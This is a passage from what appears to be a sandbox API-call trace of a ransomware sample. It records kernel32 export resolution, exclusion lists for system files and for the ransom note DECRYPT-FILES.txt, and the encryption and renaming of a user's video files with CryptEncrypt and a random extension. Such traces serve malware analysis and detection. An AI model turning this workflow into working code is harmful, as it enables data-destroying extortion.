(lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.561] lstrlenA (lpString="DELETEATOM") returned 10 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.561] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.561] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.561] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.561] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.561] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.561] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.561] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.561] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.561] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.561] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.562] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.562] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.562] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.562] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.562] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.562] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.562] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.562] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.562] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.562] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.562] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.562] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.562] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.562] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.562] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.562] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.562] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.562] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.562] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.562] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.563] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.563] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.563] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.563] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.563] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.563] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.563] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.563] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.563] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.563] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.563] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.563] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.563] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.563] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\s4JsesqKNz4f.avi") returned 70 [0087.563] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\s4JsesqKNz4f.avi.vpXRp") returned 76 [0087.563] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\s4JsesqKNz4f.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\s4jsesqknz4f.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\s4JsesqKNz4f.avi.vpXRp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\s4jsesqknz4f.avi.vpxrp"), dwFlags=0x0) returned 1 [0087.564] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.564] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.565] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.565] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ff9a450, ftCreationTime.dwHighDateTime=0x1d4cae3, ftLastAccessTime.dwLowDateTime=0x5b4ad9a0, ftLastAccessTime.dwHighDateTime=0x1d4ca30, ftLastWriteTime.dwLowDateTime=0x5b4ad9a0, ftLastWriteTime.dwHighDateTime=0x1d4ca30, nFileSizeHigh=0x0, nFileSizeLow=0x15c1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="UoljSEj8Z06B.flv", cAlternateFileName="UOLJSE~1.FLV")) returned 1 [0087.565] lstrcmpiW (lpString1="UoljSEj8Z06B.flv", lpString2="DECRYPT-FILES.txt") returned 1 [0087.565] lstrcmpiW (lpString1="UoljSEj8Z06B.flv", lpString2="autorun.inf") returned 1 [0087.565] lstrcmpiW (lpString1="UoljSEj8Z06B.flv", lpString2="boot.ini") returned 1 [0087.565] lstrcmpiW (lpString1="UoljSEj8Z06B.flv", lpString2="desktop.ini") returned 1 [0087.565] lstrcmpiW (lpString1="UoljSEj8Z06B.flv", lpString2="ntuser.dat") returned 1 [0087.565] lstrcmpiW (lpString1="UoljSEj8Z06B.flv", lpString2="iconcache.db") returned 1 [0087.565] lstrcmpiW (lpString1="UoljSEj8Z06B.flv", lpString2="bootsect.bak") returned 1 [0087.565] lstrcmpiW (lpString1="UoljSEj8Z06B.flv", lpString2="ntuser.dat.log") returned 1 [0087.565] lstrcmpiW (lpString1="UoljSEj8Z06B.flv", lpString2="thumbs.db") returned 1 [0087.565] lstrcmpiW (lpString1="UoljSEj8Z06B.flv", lpString2="Bootfont.bin") returned 1 [0087.565] lstrlenW (lpString="UoljSEj8Z06B.flv") returned 16 [0087.565] lstrcmpiW (lpString1="flv", lpString2="lnk") returned -1 [0087.565] lstrcmpiW (lpString1="flv", lpString2="exe") returned 1 [0087.565] lstrcmpiW (lpString1="flv", lpString2="sys") returned -1 [0087.565] lstrcmpiW (lpString1="flv", lpString2="dll") returned 1 [0087.565] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.565] lstrlenW (lpString="UoljSEj8Z06B.flv") returned 16 [0087.565] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.565] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="UoljSEj8Z06B.flv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UoljSEj8Z06B.flv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UoljSEj8Z06B.flv" [0087.565] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.566] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UoljSEj8Z06B.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\uoljsej8z06b.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.566] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=89115) returned 1 [0087.566] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.566] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.566] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.566] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.566] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.566] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.567] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0087.568] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.568] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.569] CloseHandle (hObject=0x42c) returned 1 [0087.570] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.570] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.570] CloseHandle (hObject=0x0) returned 0 [0087.570] CloseHandle (hObject=0x428) returned 1 [0087.570] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.571] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.571] GetTickCount () returned 0x114e560 [0087.571] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.571] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.571] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.571] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.572] lstrlenA (lpString="kernel32.dll") returned 12 [0087.572] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.572] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.572] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.572] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.572] lstrlenA (lpString="ADDATOMA") returned 8 [0087.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.572] lstrlenA (lpString="ADDATOMW") returned 8 [0087.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.572] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.572] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.572] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.572] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.572] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.573] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.573] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.573] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.573] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.573] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.573] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.573] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.573] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.573] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.573] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.573] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.573] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.573] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.573] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.573] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.573] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.573] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.574] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.574] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.574] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.574] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.574] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.574] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.574] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.574] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.574] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.574] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.574] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.574] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.574] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.574] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.574] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.574] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.574] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.574] lstrcpyA (in: lpString1=0x3f2d1ec, 